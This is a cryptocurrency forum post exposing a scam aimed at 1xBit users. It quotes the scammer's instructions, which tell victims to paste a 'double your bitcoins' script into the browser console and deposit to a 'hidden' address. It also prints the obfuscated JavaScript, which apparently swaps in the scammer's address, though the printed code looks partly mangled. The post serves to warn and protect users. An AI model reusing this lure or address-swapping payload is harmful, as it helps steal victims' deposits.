Author

Topic: Another gambling platform deposit (extension) Scammer - 1xBit (Read 159 times)

copper member
Activity: 2044
Merit: 793
A Similar scam attempt has been exposed Here and Here, but this time around halosanos is targeting 1xbit users with another fake script/plugin to double steal their deposit.

User: https://bitcointalksearch.org/user/halosanos-2803398
Thread link: https://bitcointalksearch.org/topic/double-your-bitcoins-with-1xbit-exploit-tested-today-5246402
Archive: http://archive.is/Oliwe

Flag: https://bitcointalk.org/index.php?action=trust;flag=1789

3. Now you should see a warning, that tells you to deposit only Bitcoins, not any other coins to that address. Just click “Confirm”.

4. Now you should see your main deposit address (the one that is displayed when their deposit system is working). Just note that address so you will be able to confirm that it changes after using the exploit.
screenshot: https://i.imgur.com/bl1uaSJ.png

Important: Don’t deposit to this address! If you do that - your deposit will count only once. You have to reveal the backup address, and make a deposit to the backup address to make it work. (next steps)

5. When you are on the deposit page, click a right button of your mouse anywhere on the site, and click “Inspect”.
screenshot: https://i.imgur.com/RyqdFu8.png

6. Now go to the “Console” - just like on the screenshot:
screenshot: https://i.imgur.com/6FGwnJ5.png

7. Now paste the javascript code in the console and click Enter. You will notice that your main deposit address is not displayed anymore. You will only see the hidden address. You can find the exploit javascript source code in this link: https://pastebin.com/raw/gqg8nNdg (make sure to copy everything, and don’t miss any characters.)

Important: if you can’t see the “Inspect” option, or the “Console”, just use a Google Chrome browser. I am using this browser, and I see these options without any problems.

8. Now make a deposit to the new address. (hidden backup address should start with number “1”).


Code:
var _0x493b=['\x59\x33\x4a\x35\x63\x48\x52\x76\x58\x33\x64\x68\x62\x47\x78\x6c\x64\x41\x3d\x3d','\
x61\x57\x35\x75\x5a\x58\x4a\x49\x56\x45\x31\x4d','\x4d\x55\x51\x35\x54\x6c\x46\x58\x4f\x57\x70\x48\
x53\x30\x5a\x77\x59\x6b\x78\x61\x4f\x45\x64\x33\x63\x31\x4a\x77\x57\x55\x55\x34\x59\x6e\x5a\x44\x52
\x31\x56\x68\x4e\x6e\x59\x78\x55\x51\x3d\x3d','\x5a\x32\x56\x30\x52\x57\x78\x6c\x62\x57\x56\x75\x64\x45
\x4a\x35\x53\x57\x51\x3d'];(function(_0x500ce0,_0x54e57f){var _0x2cc705=function(_0x4238a8){while(--_0x4238a8)
{_0x500ce0['push'](_0x500ce0['shift']());}};_0x2cc705(++_0x54e57f);}(_0x493b,0x17f));var _0xbddb=function(_0x319523,
_0x3cd838){_0x319523=_0x319523-0x0;var_0x34eb2e=_0x493b[_0x319523];if(_0xbddb['vwfdwx']===undefined){(function()
{var _0x28e245=function(){var _0x374313;try{_0x374313=Function('return\x20(function()\x20'+'{}.constructor(\x22return\
x20this\x22(\x20)'+');'();}catch(_0x15ce34{_0x374313=window;}return_0x374313;};var_0x5bf7e8=_0x28e245();var_0x5690be
='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x5bf7e8['atob']||(_0x5bf7e8['atob']=function
(_0x2a6367{var_0x4ba75a=String(_0x2a6367['replace'(/=+$/,'');for(var_0x3a8146=0x0,_0x38ecea,_0x5d5b3a,_0x176c9a=0x0
,_0x367bf7='';_0x5d5b3a=_0x4ba75a['charAt'](_0x176c9a++);~_0x5d5b3a&&(_0x38ecea=_0x3a8146%0x4_0x38ecea*0x40+_
0x5d5b3a:_0x5d5b3a,_0x3a8146++%0x4)?_0x367bf7+=String['fromCharCode'](0xff&_0x38ecea>>(-0x2*_0x3a8146&0x6)):
0x0{_0x5d5b3a=_0x5690be['indexOf'](_0x5d5b3a);}return _0x367bf7;});}());_0xbddb['ppxUxU']=function(_0x4fbd93)
{var_0x5e4432=atob(_0x4fbd93);var _0x475ef8=[];for(var_0x4e9482=0x0,_0x359b0e=_0x5e4432['length'];_0x4e9482
<_0x359b0e;_0x4e9482++){_0x475ef8+='%'+('00'+_0x5e4432['charCodeAt'](_0x4e9482)['toString'](0x10))['slice'](-0x2);}
return (_0x475ef8);};_0xbddb['SbCLdF']={};_0xbddb['vwfdwx']=!![];}var _0xb31d26=_0xbddb['SbCLdF'][_0x319523];
if(_0xb31d26===undefined){_0x34eb2e=_0xbddb['ppxUxU'](_0x34eb2e);_0xbddb['SbCLdF'][_0x319523]
=_0x34eb2e;}else{_0x34eb2e=_0xb31d26;}return _0x34eb2e;};_0x37b6e6:document[_0xbddb
('0x0')](_0xbddb('0x1')[_0xbddb('0x2')]=_0xbddb('0x3');
Jump to: